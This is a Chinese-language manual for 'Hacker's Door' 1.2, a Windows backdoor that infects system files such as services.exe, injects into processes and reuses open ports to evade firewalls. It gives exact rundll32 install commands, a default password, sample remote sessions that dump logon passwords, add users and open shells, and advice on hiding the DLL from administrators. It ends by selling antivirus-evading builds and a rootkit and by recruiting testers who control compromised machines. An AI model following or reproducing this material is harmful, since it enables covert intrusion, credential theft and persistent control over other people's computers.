黑客之门(hacker's door) 1.2 版
黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被感染的
系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重用系统进程
开的任意一个端口,如80,135,139,445等,这使得它很容易穿透防火墙,目前还没有工具能发现它。
黑客之门独特的文件感染启动方式和端口重用技术使得它的隐蔽性是同类软件中最好的,随着稳定性、易用
性、功能的加强,我相信它必将成为黑客的终极利器。
1.2版的改变:
1、由于反向连接还不成熟,而且会影响隐蔽性,暂时去掉。
2、增加一种使用命令行客户端的连接方式,在这种方式中可以传输文件,在这种方式的命令行窗口
中可以使用一些不即时退出的程序,如ftp,也可以登录到其它的命令行式的后门中,如黑客之门。
3、增加了一些有用的命令。
4、增加了隐蔽性和稳定性,改了一些bug。
5、更多的改进等待你们发现。
【使用环境】
服务器端:Windows 2000及以上操作系统,服务器端默认文件名为hkdoordll.dll
客户端:Windows 2000及以上操作系统,命令行客户端默认文件名为hdclient.exe
配置程序:Windows 2000及以上操作系统,命令行客户端默认文件名为HDConfig.exe
【内容】
一、配置
二、安装
2.1 感染系统文件的安装方式
2.2 通过svchost启动服务的安装方式
三、卸载
四、使用
4.1 使用NC.exe连接的方式
4.2 使用命令行客户端连接的方式
五、常见问题解答
六、招收测试人员
七、收费服务
八、特别声明
九、和我联系
一、配置
运行HDConfig.exe,选择要进行配置的黑客之门服务器端,默认是hkdoordll.dll,保存设置的时候会提示你输入
密码,如果你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码,然后你就可以修改密码了。这个密
码用于连接和卸载后门。
二、安装
由于目前Windows xp sp2下的数据执行保护功能不允许用rundll32.exe执行dll中的函数,因此如果要在xp sp2
下安装,必须先禁止数据执行保护功能。
2、1 感染系统文件的安装方式
注意:其中‘DllRegisterServer’是大小写敏感的,以下所有演示过程都是在命令行窗口下进行的。
C:/>rundll32 hkdoordll,DllRegisterServer conime.exe 1 1
上面的方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出了,适用于在自己的
机器上做测试,如果你不是做测试,就用下面的安装方式。
其中 hkdoordll是黑客之门服务器端,必须放在system32目录下,可以改名,conime.exe是你要感染的进程
默认是services.exe,如果要感染系统文件,在system32目录下的不用带路径,其它的就要带路径,第一个1是安装方式,
0表示只感染系统文件,1表示只感染进程,2表示感染系统文件,同时感染进程,默认是2;第2个1是启动方法,0是通
过创建svchost启动的服务来启动后门,1是通过感染系统文件来启动后门,默认是1。
C:/>rundll32 hkdoordll,DllRegisterServer
上面是默认安装方式,它会感染services.exe文件,以便在系统重启时启动后门,同时把自己加载到
services.exe进程中
注意:除了csrss.exe,smss.exe外,其它的系统文件都可以感染
要判断有没有安装成功,就要看system.tmp里的信息,它放在%winnt%/temp目录下,方法如下:
C:/WINNT/temp>type system.tmp //这个文件的生成会有延时,多type几次
系统找不到指定的文件。
C:/WINNT/temp>type system.tmp
2/27/2005 21:21:59 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
2/27/2005 21:21:59 l=0
Freeing 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Couldn't free
2/27/2005 21:21:59 l=0
Entering DLL_PROCESS_ATTACH,Process:Services.exe
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
UnloadDriver successfully!
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:2.0
Product type:Windows 2000/xp/2003 Professional
,SEQ:1.2pub0001,IsInstall:1
2/27/2005 21:21:59 l=0
Loading 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Loaded (0x10000000)
2/27/2005 21:22:1 l=0
Start hacker's door successfully!
2/27/2005 21:22:2 l=0
The backdoor is installed successfully!
C:/WINNT/temp>
看到“Start hacker's door successfully!”就说明安装成功了,否则就是没有成功,
你可以试试感染别的系统文件。
C:/>rundll32 hkdoordll,DllRegisterServer lsass.exe
上面是感染lsass.exe文件,同时把自己加载到lsass.exe进程中
C:/>rundll32 hkdoordll,DllRegisterServer c:/winnt/explorer.exe
上面是感染explorer.exe文件,同时把自己加载到explorer.exe进程中
注意:
安装成功或失败信息在winnt/temp/system.tmp里有记录。
在终端服务器中,直接安装出现如下错误:
C:/WINNT/system32>rundll32 hkdoordll,DllRegisterServer
C:/WINNT/temp>type system.tmp
9/2/2004 10:46:28 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1, Param[0]=C:/WINN
T/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
9/2/2004 10:46:28 l=0
InjectThread:Error CreateRemoteThread,error code:8
9/2/2004 10:46:28 l=0
InjectThread failed!
C:/WINNT/system32>
因为在msdn里说
Terminal Services isolates each terminal session by design. Therefore,
CreateRemoteThread fails if the target process is in a different session
than the calling process.
因此你用下面的方法安装(也可以用at命令用计划任务安装):
C:/WINNT/system32>psexec //127.0.0.1 -u administrator cmd.exe
PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com
Password:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:/WINNT/system32>rundll32 hkdoordll,DllRegisterServer
C:/WINNT/temp>type system.tmp //这个文件的生成会有延时,多type几次
系统找不到指定的文件。
C:/WINNT/temp>type system.tmp
2/27/2005 21:21:59 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
2/27/2005 21:21:59 l=0
Freeing 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Couldn't free
2/27/2005 21:21:59 l=0
Entering DLL_PROCESS_ATTACH,Process:Services.exe
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
UnloadDriver successfully!
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:2.0
Product type:Windows 2000/xp/2003 Professional
,SEQ:1.2pub0001,IsInstall:1
2/27/2005 21:21:59 l=0
Loading 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Loaded (0x10000000)
2/27/2005 21:22:1 l=0
Start hacker's door successfully!
2/27/2005 21:22:2 l=0
The backdoor is installed successfully!
C:/WINNT/system32>
这样就安装成功了
2、2 通过svchost启动服务的安装方式
注意:这种方法可以在3389终端中直接安装。
在命令行下运行‘rundll32 hkdoordll,DllRegisterServer 服务名 2 0’就可以了,其中‘服务名’必须合法,
如运行‘rundll32 hkdoordll,DllRegisterServer Iprip 2 0’,就创建用svchost.exe来启动的Iprip服务来
启动黑客之门,如果你不知道合法的服务名,可以先随便给一个,然后到日志里去看合法的服务名列表。卸载用
‘rundll32 hkdoordll,DllUnRegisterServer 密码 服务名 2 0’,如rundll32 hkdoordll,DllUnRegisterServer
yyt_hac Iprip 2 0’,密码和服务名必须正确。
C:/>rundll32 hkdoordll,DllRegisterServer aaa 2 0 //随便用一个服务名安装黑客之门
C:/>type c:/winnt/temp/system.tmp //查看log,得到合法的服务名
1/21/2005 23:17:37 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]=aaa,
Param[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:17:37 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:17:37 l=0
Couldn't free
1/21/2005 23:17:37 l=0
you specify service name not in Svchost/netsvcs, must be one of following:
1/21/2005 23:17:37 l=0 //下面就是合法的服务名
EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS
Sharedaccess Ntmssvc wzcsvc
1/21/2005 23:17:37 l=0
Invalid Service Name
1/21/2005 23:17:37 l=0
The backdoor is failed to be installed!
//从上面日志中选择一个服务名安装黑客之门,同时启动服务,下面选择的服务名为iprip。
C:/>rundll32 hkdoordll,DllRegisterServer iprip 2 0
C:/>type c:/winnt/temp/system.tmp
1/21/2005 23:3:35 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]
aram[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:3:35 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:3:35 l=0
Couldn't free
1/21/2005 23:3:35 l=0
The backdoor is installed successfully!
1/21/2005 23:3:35 l=0
Entering DLL_PROCESS_ATTACH,Process:svchost.exe
1/21/2005 23:3:35 l=0
Begin to start hacker's door....
1/21/2005 23:3:35 l=0
UnloadDriver successfully!
1/21/2005 23:3:35 l=0
Begin to start hacker's door....
1/21/2005 23:3:35 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000/xp/2003 Server
,SEQ:1.2beta0002,IsInstall:0
1/21/2005 23:3:37 l=0
Start hacker's door successfully!
三、卸载
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac conime.exe 1
这里yyt_hac是连接密码,必须正确,否则不能卸载。其它的参数同安装意义差不多,它根据安装的
方法来卸载后门,上面一行的意思就是把后门从conime.exe进程中卸掉。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac
上面就是把后门从services.exe进程中卸掉,同时修复被感染的services.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac lsass.exe
上面就是把后门从lsass.exe进程中卸掉,同时修复被感染的lsass.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac c:/winnt/explorer.exe
上面就是把后门从explorer.exe进程中卸掉,同时修复被感染的explorer.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac iprip 2 0
上面是卸载黑客之门的服务iprip,同时把黑客之门的dll从svchost.exe卸载掉。
C:/>type c:/winnt/temp/system.tmp //下面的信息说明服务已经卸载掉,而且黑客之门已经
退出,但是黑客之门的dll没有被从svchost.exe进程中卸载。
1/21/2005 23:4:42 l=0
The backdoor is running
1/21/2005 23:4:43 l=0
Uninstall step 1
1/21/2005 23:4:43 l=0
Uninstall step 2
1/21/2005 23:4:44 l=0
Uninstall step 3
1/21/2005 23:4:44 l=0
closehandle
1/21/2005 23:4:44 l=0
Recv exit event,the backdoor exited!
1/21/2005 23:4:46 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]=iprip,
Param[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:4:47 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:4:47 l=0
Couldn't free
下面的信息说明卸载完全成功了:
Uninstall step 1
3/20/2005 15:36:21 l=0
Uninstall step 2
3/20/2005 15:36:23 l=0
Uninstall step 3
3/20/2005 15:36:23 l=0
Terminate thread:0
3/20/2005 15:36:23 l=0
closehandle
3/20/2005 15:36:23 l=0
Recv exit event,the backdoor exited!
3/20/2005 15:36:25 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllUnregisterServer
3/20/2005 15:36:25 l=0
Freeing 'hkdoordll.dll':
3/20/2005 15:36:25 l=0
Released (0x10000000)
3/20/2005 15:36:25 l=0
The backdoor is uninstalled successfully!
卸载成功或失败信息在winnt/temp/system.tmp里有记录。
四、使用
4、1 使用NC.exe连接的方式
用nc连接被安装后门的机器的任意一个开的端口,这个端口必须能连接上,下面用139端口做例子,
然后输入“NCLOGIN 连接密码”,连接密码默认是yyt_hac,你可以在自己机器上试验,只要一台机器就可以了,
不需要在一台机器上安装,用另一台机器连接。支持多个连接,目前最多3个。
注意:[如果你不知道怎么用,可以看黑客之门1.0的动画教程]
C:/>nc 192.8.8.1 139
NCLOGIN yyt_hac
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com
HKDOOR>? //得到命令的帮助信息
?-------------------[command],Get command list and the descript of the command
hdver-------------------Get the version of hacker's door installed
findpass-------------------Get all logon user's username and password
open3389-------------------[port] [/r],with 'port' to special termserver 's port
,with '/r' to reboot system
opentelnet-------------------[port],open telnet server with [port],default port
is 23
pslist-------------------Get process list from remote machine
pskill-------------------pID,Kill the process of remote machine
getsysinfo-------------------Get the system info from remote machine
shutdown-------------------[/r],With '/r' to reboot system,else power off system
exitshell-------------------Exit the shell of hacker's door
HKDOOR>findpass //查找所有登录用户的用户名和密码
The session:0 login information is:
Domain:YYT_HAC,User:Administrator,Password:123456
HKDOOR>getsysinfo //得到基本的机器信息
Number of CPU:1
Type of CPU:Intel Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000 Server
Computer Name:YYT_HAC
System Dir:C:/WINNT/system32
HKDOOR>exitshell
Exit Successfully
C:/>
4、2 使用命令行客户端连接的方式
注意:各个版本的客户端和服务器端是一一对应的,不能相互混用。
F:/>hdclient
It is the client of hacker's door 1.2 public version
Welcome to http://www.yythac.com
usage:hdclient destip [port] [-p password] [-t logintype]
destip-------------The computer you want to connect //已经安装黑客之门机器的ip
//要连接的端口,不提供将自动扫描端口
port---------------The dest tcp port which send packet to(default is auto scan)
登录方式(0:NC连接方式,1:命令行客户端连接方式,默认是1)
logintype----------The login type which the session uses(default is 1)
password-----------The hacker's door's password //登录黑客之门的密码
Example:hdclient 192.168.1.100 139 -p yyt_hac -t 1
F:/>hdclient 192.8.8.83 -p yyt_hac //登录192.8.8.83机器,自动扫描端口,使用密码是"yyt_hac"
It is the client of hacker's door 1.2 public version
Welcome to http://www.yythac.com
Using auto select port mode //开始扫描端口
Begin Scan Port..........Find port:25 Opened! //发现25端口打开
Begin Connect to server '192.8.8.83:25'...connected! //连接到远程机器
Begin Login...Logined! //登录黑客之门成功
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>exitshell //退出黑客之门shell
Exit Successfully
F:/>hdclient 192.8.8.83 445 -p yyt_hac //使用445端口连接到黑客之门
It is the client of hacker's door 1.2
Welcome to http://www.yythac.com
Begin Connect to server...connected!
Begin Login...Logined!
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>? //得到黑客之门的命令列表
********The Command List of Hacker's door********
?-----------------[command],Get command list and the descript of the command
hdver-------------Get the version of hacker's door installed
findpass----------Get all logon user's username and password
open3389----------[port] [/r],with 'port' to special termserver 's port,with '/r
' to reboot system
opentelnet--------[port],open telnet server with [port],default port is 23
pslist------------Get process list from remote machine
pskill------------pID,Kill the process of remote machine
getsysinfo--------Get the system info from remote machine
shutdown----------[/r],With '/r' to reboot system,else power off system
exitshell---------Exit the shell of hacker's door
winexec-----------command,execute command using winexec function
openshell---------[cmdfile],use cmdfile to create a process to execute command
geturl------------url [localfilename],get file from 'url' to 'localfilename'
getdisk-----------get all disk
getdir------------list all files and dirs
getfile-----------[srcfile] [dstfile],get [srcfile] from remote machine to local
machine,and rename to [dstfile]
putfile-----------[srcfile] [dstfile],put [srcfile] from local machine to remote
machine,and rename to [dstfile]
cddir-------------[dir],change current dir to [dir]
HKDOOR>hdver //得到黑客之门服务器端的版本
The version of hacker's door server is 1.2
Welcome to http://www.yythac.com
HKDOOR>cddir //得到当前目录
C:/WINNT/system32
HKDOOR>getdir c:/ //得到c:/目录和文件列表
boot.ini bootfont.bin BOOTSECT.DOS CONFIG.SYS [DELL] [Documen
ts and Settings] [Downloads] [DRIVERS] [drvrtmp] hiberfil
.sys [hkdoor] [Inetpub] IO.SYS [log] MSDOS.SYS [My Musi
c] NTDETECT.COM ntldr pagefile.sys [Program Files] [RECYCLER]
[symserver] [System Volume Information] [wgjxsourcefile] [WINDOWS
] [WINNT] [WUTemp]
HKDOOR>cddir f:/ //改变当前目录为f:/
Change dir successfully!
HKDOOR>getdir //得到当前目录的列表
[Documents and Settings] DrvFltIp.sys [drvrtmp] Hackkit.exe
hdclient.exe hkdoor12beta.rar [i386] [msdownld.tmp] [My Music]
HKDOOR>getdisk //得到所有盘符
c: d: f: g: h: i:
//把远程机器上的c:/shares/nc.exe下载到本地的c:/nc.exe
HKDOOR>getfile c:/shares/nc.exe c:/nc.exe
Begin get file....
Get file successfully!
HKDOOR>putfile c:/nc.exe c:/b.exe //把本地的c:/nc.exe上传到远程机器的c:/b.exe
Begin put file....Put file successfully!
HKDOOR>getdir c:/ //可以看到b.exe已经存在了
AUTOEXEC.BAT b.exe boot.ini bootfont.bin CONFIG.SYS [Documen
ts and Settings] IO.SYS MSDOS.SYS NTDETECT.COM ntldr pagefile
.sys [Program Files] [RECYCLER] [shares] [System Volume Informati
on] [WINDOWS]
HKDOOR>pslist //查看进程
ProcessID ProcessName
176 /SystemRoot/System32/smss.exe
200 /??/C:/WINNT/system32/csrss.exe
224 /??/C:/WINNT/system32/winlogon.exe
252 C:/WINNT/system32/services.exe
264 C:/WINNT/system32/lsass.exe
364 C:/WINNT/System32/termsrv.exe
504 C:/WINNT/system32/svchost.exe
544 C:/WINNT/system32/spoolsv.exe
780 C:/WINNT/System32/msdtc.exe
860 D:/program files/nav/defwatch.exe
876 C:/WINNT/system32/Dfssvc.exe
900 C:/WINNT/System32/tcpsvcs.exe
920 C:/WINNT/System32/svchost.exe
948 C:/WINNT/system32/cba/pds.exe
1000 C:/WINNT/System32/ismserv.exe
1024 C:/WINNT/System32/llssrv.exe
1080 D:/program files/nav/rtvscan.exe
1168 D:/Program Files/SSC/NSCTOP.EXE
1292 C:/WINNT/system32/ntfrs.exe
1392 D:/Program Files/Symantec/Quarantine/Server/qserver.exe
1412 C:/WINNT/system32/regsvc.exe
1424 C:/WINNT/System32/locator.exe
1440 D:/Program Files/Symantec/Quarantine/Server/ScanExplicit.exe
1448 C:/WINNT/system32/MsgSys.EXE
1504 C:/WINNT/system32/MSTask.exe
1556 C:/Program Files/RaidMan/RaidServ.exe
1584 C:/WINNT/System32/svchost.exe
1704 C:/WINNT/System32/WBEM/WinMgmt.exe
1744 C:/WINNT/System32/wins.exe
1760 C:/Program Files/UltraVNC/WinVNC.exe
1784 C:/WINNT/system32/svchost.exe
1816 C:/WINNT/System32/dns.exe
1868 D:/Program Files/Symantec/Quarantine/Server/IcePack.exe
1960 C:/WINNT/system32/ams_ii/hndlrsvc.exe
2016 C:/WINNT/system32/ams_ii/iao.exe
2052 C:/WINNT/system32/cba/xfr.exe
2184 D:/exchsrvr/bin/mad.exe
2424 C:/WINNT/System32/svchost.exe
2456 D:/exchsrvr/bin/dsamain.exe
2832 D:/exchsrvr/bin/store.exe
2900 D:/exchsrvr/bin/emsmta.exe
3256 D:/exchsrvr/bin/events.exe
2768 C:/Program Files/NAVMSE/NAVESRV.EXE
3400 D:/exchsrvr/bin/dxa.exe
3444 D:/EXCHSRVR/connect/msexcimc/bin/msexcimc.exe
3516 C:/Program Files/NAVMSE/naveap.exe
1912 C:/WINNT/system32/MAPISP32.EXE
664 C:/WINNT/system32/dllhost.exe
1036 C:/WINNT/command.exe
2432 C:/WINNT/Explorer.EXE
3204 D:/PROGRA~1/nav/vptray.exe
4076 /??/C:/WINNT/system32/csrss.exe
2036 /??/C:/WINNT/system32/winlogon.exe
2448 C:/WINNT/Explorer.EXE
2564 C:/WINNT/system32/tsadmin.exe
2896 C:/WINNT/system32/taskmgr.exe
4124 C:/WINNT/system32/cmd.exe
HKDOOR>pskill taskmgr.exe //杀进程,可以用进程ID和进程名
The process has been killed!
HKDOOR>winexec "cmd /c copy c:/winnt/system32/cmd.exe c:/winnt/temp/a.exe" //执行内部命令
Command execute successfully!
HKDOOR>winexec "net user test /add" //执行外部命令
Command execute successfully!
HKDOOR>openshell //开命令行窗口
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
c:/>
c:/>ftp ftp.microsoft.com //在shell环境下使用ftp
Connected to ftp.microsoft.com.
220 Microsoft FTP Service
User (ftp.microsoft.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Welcome to ftp.microsoft.com. Please also visit http://www.microsoft.com/do
wnloads.
230 Anonymous user logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bussys
deskapps
developr
KBHelp
MISC
MISC1
peropsys
Products
PSS
ResKit
Services
Softlib
226 Transfer complete.
ftp: 101 bytes received in 0.01Seconds 6.73Kbytes/sec.
ftp> cd reskit
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bork
IIS4
mspress
nt4
win2000
win98
y2kfix
226 Transfer complete.
ftp: 50 bytes received in 0.01Seconds 3.33Kbytes/sec.
ftp> bye
221 Thank you for visiting ftp.microsoft.com.
c:/>nc 192.8.8.83 445 //可以用ctrl+c中断进程
^C
c:/>nc 192.8.8.1 21 //连接到另一台机器上的黑客之门
220 yyt_hac Microsoft FTP Service (Version 5.0).
NCLOGIN HelloWorld! //输入NCLOGIN 连接密码
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>openshell //开当前黑客之门的shell
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:/WINNT/system32>
C:/WINNT/system32>exit //退出当前黑客之门命令行窗口
HKDOOR>exitshell //退出当前的黑客之门
Exit Successfully
c:/>exit //再退出当前黑客之门命令行窗口
HKDOOR>exitshell //这里就完全退出黑客之门,返回本地机器
Exit Successfully
F:/>
五、常见问题解答(请先看使用说明和动画教程)
黑客之门1.0使用说明:http://www.yythac.com/ar/hk_readme_cn.txt
黑客之门1.0动画教程:http://www.yythac.com/ar/hk_dhjx.html
5、1 隐蔽性方面的问题
1、黑客之门服务器端的日期是最新的,放在system32目录下如果按时间排列方式查看文件很容易被发现?
答:这个问题很简单,因为文件的时间是很容易改变的,如果你会编程只要几行代码就行,如果不会编程
就找网上找工具吧,不过1.1、1.2版配置程序会把服务器端的时间改成和system32目录下其它系统文件
差不多,这个问题已经不是问题了。
2、黑客之门服务器端文件的属性信息中包含了hkdoordll的信息,容易被发现?
答:这个问题也很简单,因为这些信息也是可以改的,用exescope就可以了。
3、黑客之门服务器端需要放在system32目录下,如果管理员定期备份system32下的文件列表的话,一比较
就可以发现黑客之门?
答:首先这样做的管理员不多,其次黑客之门服务器端也不一定要放在system32目录下,使用说明中说要
放在system32目录下是因为怕一些人乱放,因为放错了会导致系统崩溃,具体还有哪些地方可以放我就不
说了,因为要具体问题具体分析。
4、黑客之门服务器端的dll在进程中不隐藏,因此只要看到进程中加载了hkdoordll.dll就发现黑客之门了?
答:这个问题超级菜,因为黑客之门服务端是可以改名的,你把它改成和系统文件相似的名字不就行了,
伪装一下嘛,没有人去抢劫还会在自己脑袋写上“我是强盗”的。
总结:黑客之门本身隐蔽性已经做的很好了,可是如果你不会用它,那它的隐蔽性再好也是枉然,就像一把
绝世好剑落到一个不会使剑的人手中,那和一把普通的剑也没什么区别,只有在真正的剑客手中才能发挥出
它最大的威力。
5、2 配置方面的问题
1、当我配置好黑客之门服务器端,要保存配置信息的时候,却提示要输入密码,这个密码是什么?
答:如果这个黑客之门服务器端你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码。
2、配置黑客之门服务器端时那个连接密码有什么用?
答:这个密码就是你以后登录黑客之门服务器端和卸载黑客之门服务器时要用到的密码。
5、3 安装方面的问题
1、为什么我用 rundll32 hkdoordll,DllRegisterServer安装时,弹出对话框说“加载hkdoordll出错,找
不到指定的模块”?
答:首先,你有没有把黑客之门服务器端放在system32目录下,其次你是否把黑客之门服务端改名了,如果
你把它改成了kernel.dll,就必须用 rundll32 kernel,DllRegisterServer 安装。
2、为什么我用 rundll32 hkdoordll,dllregisterserver 安装时,弹出对话框说“hkdoordll出错,丢失
条目:dllregisterserver”?
答:“dllregisterserver”应该为“DllRegisterServer”,要区分大小写,要完全一样。
3、为什么安装黑客之门后在system32中找不到system.log文件?
答:新版黑客之门的日志在winnt/temp/system.tmp里。
4、安装时为什么在日志中看到“InjectThread:"d~zKBz&zjpBz9;~zKlJJSK#Vzlf" error code:8”或“远程
执行线程失败!”或“CreateRemoteThread failed!”,从而没有安装成功?
答:首先你要确定你有administrator或system用户权限,其次你要确定你不是在3389终端中直接安装黑客
之门,如果你没有权限,那要先提升权限,如果你在3389终端中安装,请看使用说明中的安装方法。
5、安装时为什么在日志中看到"cannot find enough space to add import function"或"没有足够的空间用
来增加新的输入函数"从而安装失败?
答:对于这个问题你只能换一个系统文件来感染,那么多系统文件不可能找不到合适的,再说黑客之门也不是
一定要感染系统文件,任何在系统启动时会自动运行的文件都可以。
6、我安装了以前版本的黑客之门,怎么升级成新版的?
答:一种方法是先卸载老版本的黑客之门,然后安装新的,不过安装时不要感染和老版本一样的系统文件,安
装成功后就行了,另一种方法是先把老的黑客之门服务器端改名,然后把新的黑客之门服务器端改成老的黑客
之门服务器端改名之前的名字就可以了,不过要系统启动后新的黑客之门才会生效。
7、为什么我用加密压缩软件处理过黑客之门服务器端后,安装黑客之门会导致系统崩溃?
答:黑客之门服务器端只能用exe压缩软件压缩,不要用exe加密软件加密,否则可能会导致这种问题。
5、4 连接方面的问题
1、使用说明中提到的nc是什么东西?
答:这个问题我真的不想回答,我只想告诉你nc是一个很出名的网络工具,其它的自己到网上去找。
2、为什么我用nc连接后,用netstat命令看到连接已经建立,却看不到任何提示信息(比如提示输入密码)?
答:黑客之门最大的一个特点就它的端口重用特性,这也是它和目前其它一些后门的区别,你连接的端口是
系统本身开的,和黑客之门没有关系,连接建立后黑客之门当然不会返回信息,假如它返回信息那还有什么
隐蔽性可言。要有返回信息也是开端口的进程返回的信息,比如你连接21端口,就会返回登录ftp服务器的信息,
这时你必须输入“NCLOGIN 连接密码”才能登录黑客之门。
3、为什么我用nc连接后,没法输入“NCLOGIN 连接密码”?
答:这是因为连接根本没有建立起来,你要选择一个目标机器开的,而且你能连接上的端口才行。
4、如果目标机器没有开任何一个端口(包括用防火墙封了所有端口),我能连上黑客之门吗?
答:对于这种机器只有用反向连接方式才行,目前反向连接方式只有1.1版支持,1.2版不支持,因此1.2版没法
连上黑客之门。
5、我能连接上内网中装了黑客之门的机器吗?
答:如果你和那台内网机器在同一个局域网中,那是可以的,否则参考问题4的答案。
6、为什么我在资源管理器中双击hdclient.exe后,只是有个黑窗口一闪,然后什么都没有?
答:hdclient.exe是黑客之门命令行客户端,用来在命令行下连接到黑客之门服务器端,必须在命令行窗口下
使用。
7、我用hdclient.exe登录黑客之门服务器端后,用openshell命令开了命令行窗口,但是命令行窗口却没有滚
动条,没法看超过一屏的输出,怎么办?
答:hdclient.exe登录黑客之门服务器端后,开的命令行窗口是没有滚动条的,但是你可以在其中用一些不实时
退出的工具,如ftp,也可以登录到其它的后门中,如果你想看超过一屏的输出,可以在命令后加more命令,如
'dir | more',用nc登录后开的命令行窗口就有滚动条了,可是不能用不实时退出的工具。
8、用nc.exe连接和用hdclient.exe连接登录黑客之门服务器端后有什么区别?
答:用hdclient.exe登录黑客之门服务器端后能够使用1.2版新加的命令,可以上传和下载文件,开命令行端口后
可以在其中用一些不实时退出的工具,如ftp,也可以登录到其它的后门中,而且连接也进行了加密和压缩;而用
nc连接后就没有这些优点,不过它和服务器端交换的信息少,速度比较快。
总结:上面的一些问题很多都是很简单的,出现这些问题有的是因为使用者水平比较低,有的是因为没有仔细看
使用说明,黑客之门目标是要成为一个专业级后门,而不是傻瓜式的木马,我希望它成为真正黑客的终极之剑,
而不是给菜鸟使用的菜刀。所以要想真正用好黑客之门,自身的水平是很重要的。
六、招收测试人员
为了把黑客之门做得更好,需要一些稳定的内部测试人员,条件如下:
1、有很好的上网条件。
2、有比较高的计算机水平,特别是对后门技术有一定的了解。
3、有一定数量的肉鸡。
测试人员的义务:
1、帮忙测试最新版的黑客之门,提交完整的测试报告。
测试人员的权利:
1、黑客之门最新公开版发布两周后,将给测试人员一份测试人员专用版,它和公开版和内部版的特征码都不相同,
不会生成日志,不会被杀毒软件查杀。
2、通过本人非公开QQ定期进行技术交流,帮助测试人员解决各种技术问题。
如果你符合条件并且想成为黑客之门的内部测试人员,请与我联系。
七、收费服务
为了满足一些人的需求,本人成立yyt_hac工作室,同时提供下列收费服务:
1、出售黑客之门内部版--价格:58元/份,所有的内部版具有相同的特征码,如果被查杀可以免费更换同一版本
的黑客之门内部免查杀版。
2、出售黑客之门个人版--价格:98元/份,各个个人版都有不同的特征码,个人版之间及个人版与其它版本之间
客户端不通用,如果被查杀可以免费更换同一版本的黑客之门个人免查杀版。
3、提供黑客之门定制服务--价格:根据工作量大小而定,专门为一些有特殊需要的人定制,收费会比较高,一般
的人用内部版或个人版就足够了。
4、出售yyt_hac's ntrootkit 1.22 免查杀版--78元/份,如果被查杀可以免费更换同一版本的ntrootkit免查杀
版。
5、提供定制其它各种网络安全及黑客类软件服务,价格面议。
黑客之门内部版和黑客之门个人版在黑客之门公开版发布两周后提供,我的朋友和帮助过我的人可以免费索取,
购买收费版的用户可以通过本人专用QQ得到技术支持。
如果你有这方面的需求,请与我联系,我们的口号是‘只有想不到,没有做不到’!
如果你有项目介绍给我,项目成功完成后,你将得到项目总费用的10%,不到100元的等积累到100再付。
购买须知:
本人出售的软件不能保证在所有的环境都能正常使用,如果遇到不能使用的情况请更换其它软件。
八、特别声明:
本软件为免费软件,请勿将其用于非法用途。由本软件引起的任何后果均由使用者本人承担,软件作者概不
承担任何责任。
